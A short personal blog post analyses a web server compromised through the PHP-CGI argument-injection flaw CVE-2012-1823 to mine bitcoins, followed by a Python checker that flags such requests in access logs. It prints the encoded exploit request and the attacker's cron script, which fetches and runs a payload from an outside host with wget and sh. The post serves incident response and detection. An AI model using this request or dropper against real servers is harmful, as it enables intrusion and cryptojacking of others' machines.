https://michele.zonca.org

Investigating on a server hacked to mine bitcoins

By Michele Zonca

8 November 2013

1 minute to read

A friend of mine had issues with a web server being very slow and sometimes even unavailable.

When I connected I found a process eating all the CPU time available. It was mining bitcoins.

What I found is that they used this vulnerability, CVE-2012-1823, to execute arbitrary code.

access.log is full of lines like this one:

127.0.0.1 - - [08/Nov/2013:02:28:52 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.0" 504 529 "-" "-"

Used to download and execute this script:

cat /tmp/update

#!/bin/sh
# Look for a miner process already connected to the pool; field 7 of "ps x" is the command
plm=`ps x|grep mine.cc.st:3333|grep -v grep|awk '{print $7}'`
if [ "$plm" != "" ]
then echo "MERGE!!!"   # Romanian for "it works"
else
# Otherwise fetch the dropper again and run it detached in the background
nohup wget http://update.cc.st/a && sh a >> /dev/null &
fi

Put in crontab, this script checks whether the miner is running and, if it is not, downloads and executes it again: http://pastebin.com/4PVDpkCe

Using an Apache vulnerability means that the resulting code is executed as www-data, without real console access and with limited privileges over the file system.

What I did, so far, is to stop the mining process, add update.cc.st to /etc/hosts pointing to localhost, disable /cgi-bin/php on the default domain and clean the file system. Now I will wait for my friend to decide whether she wants to proceed with an update or, better, a complete reinstall.
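To check other servers' logs for the same kind of request, here is a small checker added as an example (it is not from the original post). It parses each access.log line and flags a request to a php CGI binary whose query string contains no literal "=" (the condition under which the CGI spec hands the query string to php-cgi as command-line arguments) and decodes to -d/-n switches. The sample input reuses the log line shown above plus two constructed benign lines; the path suffixes checked are an assumption.

```python
import re
from urllib.parse import unquote_plus

# Apache common/combined log format, only the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" (?P<status>\d{3})'
)
# Single-letter php-cgi switch such as -d (set ini directive) or -n (ignore php.ini).
SWITCH_RE = re.compile(r'^-[A-Za-z]$')
# Assumed names under which php-cgi is commonly exposed.
CGI_SUFFIXES = ('/php', '/php-cgi', '/php5')

# Sample input: the line from the post, then two constructed lines that must not be flagged.
SAMPLE_LOG = [
    '127.0.0.1 - - [08/Nov/2013:02:28:52 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.0" 504 529 "-" "-"',
    '127.0.0.1 - - [08/Nov/2013:02:30:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [08/Nov/2013:02:31:07 +0000] "GET /cgi-bin/php?file=test HTTP/1.1" 200 512 "-" "-"',
]

def check_line(line):
    """Return None for a normal line, or a dict describing a php-cgi argument injection."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, sep, raw_query = m.group('target').partition('?')
    if not sep or not path.lower().endswith(CGI_SUFFIXES):
        return None
    # A query string with an unencoded '=' is treated as form data, not argv,
    # so the attack must encode '=' as %3D; a literal '=' rules the line out.
    if '=' in raw_query:
        return None
    argv = unquote_plus(raw_query).split()
    if not any(SWITCH_RE.match(tok) for tok in argv):
        return None
    # Collect the ini directives set with -d so an analyst sees what was changed.
    directives = [argv[i + 1] for i, tok in enumerate(argv) if tok == '-d' and i + 1 < len(argv)]
    return {'ip': m.group('ip'), 'ts': m.group('ts'), 'path': path,
            'argv': argv, 'directives': directives}

def scan(lines):
    """Run check_line over an iterable of log lines and keep the hits."""
    return [hit for hit in (check_line(l) for l in lines) if hit]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit['ts'], hit['ip'], hit['path'], ' '.join(hit['argv']))
```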